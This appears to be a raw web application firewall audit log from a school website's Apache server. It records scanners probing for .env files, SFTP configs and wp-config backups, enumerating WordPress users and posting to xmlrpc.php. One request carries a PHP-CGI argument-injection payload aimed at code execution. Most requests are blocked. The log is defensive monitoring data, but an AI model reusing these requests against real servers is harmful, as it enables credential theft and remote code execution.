aBfpEvZJDMuQndL03JOzAwAAAFI 103.236.140.4 36388 103.236.140.4 8181 --1b4de616-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.189.53 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.189.53 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1b4de616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b4de616-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746397458622255 877 (- - -) Stopwatch2: 1746397458622255 877; combined=378, p1=337, p2=0, p3=0, p4=0, p5=40, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b4de616-Z-- --4814d870-A-- [05/May/2025:06:04:29 +0700] aBfyfYZWvR7-42f6JrBtSgAAAMM 103.236.140.4 40244 103.236.140.4 8181 --4814d870-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.123.238.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.123.238.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --4814d870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4814d870-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746399869801553 931 (- - -) Stopwatch2: 1746399869801553 931; combined=325, p1=285, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4814d870-Z-- --639aa571-A-- [05/May/2025:09:12:43 +0700] aBgem_ZJDMuQndL03JO0_AAAAEg 103.236.140.4 43766 103.236.140.4 8181 --639aa571-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.186.245 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* Cookie: X-Forwarded-For: 188.166.186.245 Accept-Encoding: gzip X-Varnish: 137443420 --639aa571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --639aa571-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746411163438641 935 (- - -) Stopwatch2: 1746411163438641 935; combined=395, p1=356, p2=0, p3=0, p4=0, p5=38, sr=141, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --639aa571-Z-- --e6c3331f-A-- [05/May/2025:09:15:09 +0700] aBgfLfZJDMuQndL03JO0_wAAAFc 103.236.140.4 43792 103.236.140.4 8181 --e6c3331f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --e6c3331f-C-- --e6c3331f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6c3331f-E-- --e6c3331f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746411309617313 3555 (- - -) Stopwatch2: 1746411309617313 3555; combined=2021, p1=460, p2=1525, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6c3331f-Z-- --c297a32e-A-- [05/May/2025:12:26:09 +0700] aBhL8YZWvR7-42f6JrB3JwAAANg 103.236.140.4 51224 103.236.140.4 8181 --c297a32e-B-- GET /wp-config.php.maj HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.235.146.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.235.146.29 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --c297a32e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c297a32e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422769426021 938 (- - -) Stopwatch2: 1746422769426021 938; combined=370, p1=317, p2=0, p3=0, p4=0, p5=53, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c297a32e-Z-- --10d4c279-A-- [05/May/2025:12:26:09 +0700] aBhL8fZJDMuQndL03JO_CQAAAFc 103.236.140.4 51230 103.236.140.4 8181 --10d4c279-B-- GET /wp-config.php.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.235.146.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.235.146.29 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --10d4c279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10d4c279-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422769950756 884 (- - -) Stopwatch2: 1746422769950756 884; combined=301, p1=266, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10d4c279-Z-- --2f094f7e-A-- [05/May/2025:12:26:11 +0700] aBhL84ZWvR7-42f6JrB3KAAAAMA 103.236.140.4 51248 103.236.140.4 8181 --2f094f7e-B-- GET /wp-config.old.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.235.146.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.235.146.29 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --2f094f7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f094f7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422771008036 819 (- - -) Stopwatch2: 1746422771008036 819; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f094f7e-Z-- --e9253339-A-- [05/May/2025:12:26:18 +0700] aBhL-oZWvR7-42f6JrB3PwAAAMo 103.236.140.4 51442 103.236.140.4 8181 --e9253339-B-- GET /wp-config.php.CloudTech_bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.56.83.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.56.83.83 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --e9253339-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9253339-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422778969237 669 (- - -) Stopwatch2: 1746422778969237 669; combined=262, p1=228, p2=0, p3=0, p4=0, p5=34, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9253339-Z-- --7018aa38-A-- [05/May/2025:12:26:21 +0700] aBhL_U2V_h1VFAgsfgbOxQAAABI 103.236.140.4 51528 103.236.140.4 8181 --7018aa38-B-- GET /wp-config.php__ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --7018aa38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7018aa38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422781092485 833 (- - -) Stopwatch2: 1746422781092485 833; combined=338, p1=297, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7018aa38-Z-- --e4d05e22-A-- [05/May/2025:12:26:23 +0700] aBhL_02V_h1VFAgsfgbOzgAAAAg 103.236.140.4 51582 103.236.140.4 8181 --e4d05e22-B-- GET /wp-config.php-work HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --e4d05e22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4d05e22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422783831049 800 (- - -) Stopwatch2: 1746422783831049 800; combined=328, p1=288, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4d05e22-Z-- --feea823a-A-- [05/May/2025:12:26:26 +0700] aBhMAvZJDMuQndL03JO_HgAAAE4 103.236.140.4 51616 103.236.140.4 8181 --feea823a-B-- GET /wp-config.php______ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --feea823a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --feea823a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422786179177 875 (- - -) Stopwatch2: 1746422786179177 875; combined=338, p1=297, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --feea823a-Z-- --fe08ca07-A-- [05/May/2025:13:15:21 +0700] aBhXefZJDMuQndL03JPULgAAAEQ 103.236.140.4 52266 103.236.140.4 8181 --fe08ca07-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.189.53 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.189.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --fe08ca07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe08ca07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746425721539921 748 (- - -) Stopwatch2: 1746425721539921 748; combined=293, p1=256, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe08ca07-Z-- --7f7aa453-A-- [05/May/2025:13:26:00 +0700] aBhZ-IZWvR7-42f6JrCRxQAAAMk 103.236.140.4 42882 103.236.140.4 8181 --7f7aa453-B-- GET /sftp-config.json HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 15.237.179.14 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 15.237.179.14 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --7f7aa453-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f7aa453-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746426360787363 965 (- - -) Stopwatch2: 1746426360787363 965; combined=362, p1=321, p2=0, p3=0, p4=0, p5=41, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f7aa453-Z-- --79ec6a34-A-- [05/May/2025:16:16:37 +0700] aBiB9YZWvR7-42f6JrDXggAAANE 103.236.140.4 42392 103.236.140.4 8181 --79ec6a34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --79ec6a34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79ec6a34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746436597475963 3129 (- - -) Stopwatch2: 1746436597475963 3129; combined=1436, p1=439, p2=966, p3=0, p4=0, p5=30, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79ec6a34-Z-- --0fca7367-A-- [05/May/2025:16:16:40 +0700] aBiB-ARwKNFSM6B7_LZ1JwAAAIE 103.236.140.4 42468 103.236.140.4 8181 --0fca7367-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0fca7367-C-- demo.sayHello --0fca7367-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fca7367-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746436600540079 5686 (- - -) Stopwatch2: 1746436600540079 5686; combined=4573, p1=565, p2=3670, p3=34, p4=46, p5=145, sr=72, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fca7367-Z-- --36bddf77-A-- [05/May/2025:16:28:34 +0700] aBiEwgRwKNFSM6B7_LZ3oQAAAIc 103.236.140.4 53472 103.236.140.4 8181 --36bddf77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36bddf77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36bddf77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746437314563402 3583 (- - -) Stopwatch2: 1746437314563402 3583; combined=1526, p1=512, p2=975, p3=0, p4=0, p5=38, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36bddf77-Z-- --0d43d72f-A-- [05/May/2025:16:28:37 +0700] aBiExQRwKNFSM6B7_LZ3ogAAAJU 103.236.140.4 53476 103.236.140.4 8181 --0d43d72f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0d43d72f-C-- demo.sayHello --0d43d72f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d43d72f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746437317331472 5220 (- - -) Stopwatch2: 1746437317331472 5220; combined=3961, p1=449, p2=3285, p3=36, p4=32, p5=92, sr=68, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d43d72f-Z-- --7ebcec2d-A-- [05/May/2025:16:34:15 +0700] aBiGFwRwKNFSM6B7_LZ4GAAAAII 103.236.140.4 55680 103.236.140.4 8181 --7ebcec2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ebcec2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ebcec2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746437655542298 2591 (- - -) Stopwatch2: 1746437655542298 2591; combined=1244, p1=394, p2=820, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ebcec2d-Z-- --a8ac1b5c-A-- [05/May/2025:16:34:18 +0700] aBiGGk2V_h1VFAgsfgZGjwAAAAk 103.236.140.4 55722 103.236.140.4 8181 --a8ac1b5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: 